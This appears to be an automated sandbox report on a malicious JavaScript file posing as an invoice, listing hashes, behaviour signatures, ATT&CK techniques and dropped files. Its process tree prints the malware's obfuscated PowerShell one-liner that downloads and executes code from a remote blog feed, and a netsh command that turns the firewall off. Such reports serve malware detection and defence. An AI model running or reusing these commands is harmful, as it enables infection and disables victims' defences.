Overview

overview

10

Static

static

1

invoice_2566246817.js

windows7-x64

7

invoice_2566246817.js

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2023 07:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice_2566246817.js

  • Size

    106KB

  • MD5

    fc6d7a11059fee2eda2bab5e4c82c839

  • SHA1

    9907895c521bddd02573ca5e361490f017932dbe

  • SHA256

    39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c

  • SHA512

    1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39

  • SSDEEP

    384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mpw4uqrx\mpw4uqrx.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3996
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES978D.tmp" "c:\Users\Admin\AppData\Local\Temp\mpw4uqrx\CSC38DF9718EE75440CB0CB3ACD74F1C2AF.TMP"
          4⤵
            PID:4700
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:1696
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2708
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2776
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 712
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:2716
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Drops file in Windows directory
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:1832

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES978D.tmp
      Filesize

      1KB

      MD5

      adfbcfe3be9e7947fff3041c6decc7f9

      SHA1

      97f4fab4c8800f6f806d710c51315b440e3ff30a

      SHA256

      b56b559c5742a6dba6d0b52246e413ce0d9c313086ba0c29f2ebe2c2b5746d9c

      SHA512

      1094fb647eb375c14be2de33ee43382ce539454a3877a8b32626b1b555da8a155a98ffc3a9699e213c3411d8a832d5b8d3a014d1acd5cfe6f211f235d80e4601

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mmcpg0rs.na1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\mpw4uqrx\mpw4uqrx.dll
      Filesize

      3KB

      MD5

      fb161a4f2584ad6edebe7308974f7a5b

      SHA1

      f1fe77e2ba778da930e72826970b2333b922d056

      SHA256

      607e8c03f46a24500730448d7e473762fb1934d1a5ca7c57101f933e47b42182

      SHA512

      4e214a027282b93f506759138e4329a9c444114273fbd4b7ff7c2700345b685dc2e8423e9dece5df1625fbf023ce579808c10491078bb36bc79495b84b91688b

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mpw4uqrx\CSC38DF9718EE75440CB0CB3ACD74F1C2AF.TMP
      Filesize

      652B

      MD5

      7c83994367be999d72a7d0186eb257cd

      SHA1

      302e7fa60a637f55180bb9cfbafb05c33a437e31

      SHA256

      6462dceb7d1d7324dbd2707e627efd20b27d6fc99294160f2ca9d68798dd06c6

      SHA512

      62d5d2dcd1b35daec7381ccb44b83fc61a0c7674b34c9f50338818d590d7bb9c624196528b0d855437806fa52cdf290e35e86a7c825571c83352cf8bf0588943

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mpw4uqrx\mpw4uqrx.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mpw4uqrx\mpw4uqrx.cmdline
      Filesize

      369B

      MD5

      fd735ae5110224d3a7d478e5a96ba551

      SHA1

      a989117aa6026048ce233df6ae189f8e5b3aefd3

      SHA256

      52a60db51c3d936c446563eac77eaa6bc9d237437e21a28a574e1843ffb3b044

      SHA512

      2e6d7b0b754de1f9397dfb4f727a8d3215e5fe5838e5f41937830f41280ede65f2c250f4fde50ab7abf17517fe13cb764d1792814f0544deb6f30c0185796f75

      Download Submit

    • memory/1748-48-0x0000000074920000-0x0000000074ED1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1748-58-0x0000000074920000-0x0000000074ED1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1748-41-0x00000000011F0000-0x0000000001200000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1812-13-0x000001E9A83C0000-0x000001E9A8582000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/1812-12-0x000001E98DC80000-0x000001E98DC90000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1812-27-0x000001E9A7FE0000-0x000001E9A7FE8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1812-29-0x000001E98DBE0000-0x000001E98DBEE000-memory.dmp

      Filesize

      56KB

      Download

    • memory/1812-30-0x000001E98DC20000-0x000001E98DC3A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1812-62-0x00007FFB3CC70000-0x00007FFB3D731000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1812-37-0x00007FFB3CC70000-0x00007FFB3D731000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1812-0-0x000001E98F610000-0x000001E98F632000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1812-59-0x000001E98DC80000-0x000001E98DC90000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1812-11-0x000001E98DC80000-0x000001E98DC90000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1812-10-0x00007FFB3CC70000-0x00007FFB3D731000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2708-36-0x0000000001200000-0x000000000126C000-memory.dmp

      Filesize

      432KB

      Download

    • memory/2708-44-0x0000000005920000-0x00000000059B2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/2708-47-0x0000000005890000-0x00000000058F6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2708-38-0x0000000074170000-0x0000000074920000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2708-39-0x0000000005ED0000-0x0000000006474000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2708-31-0x0000000000400000-0x000000000046C000-memory.dmp

      Filesize

      432KB

      Download

    • memory/2708-63-0x0000000006EA0000-0x0000000006EF0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2708-64-0x00000000070C0000-0x0000000007282000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/2708-65-0x0000000006F90000-0x000000000702C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/2708-66-0x0000000006F80000-0x0000000006F8A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2708-67-0x0000000074170000-0x0000000074920000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2776-40-0x0000000074920000-0x0000000074ED1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2776-51-0x0000000001580000-0x0000000001590000-memory.dmp

      Filesize

      64KB

      Download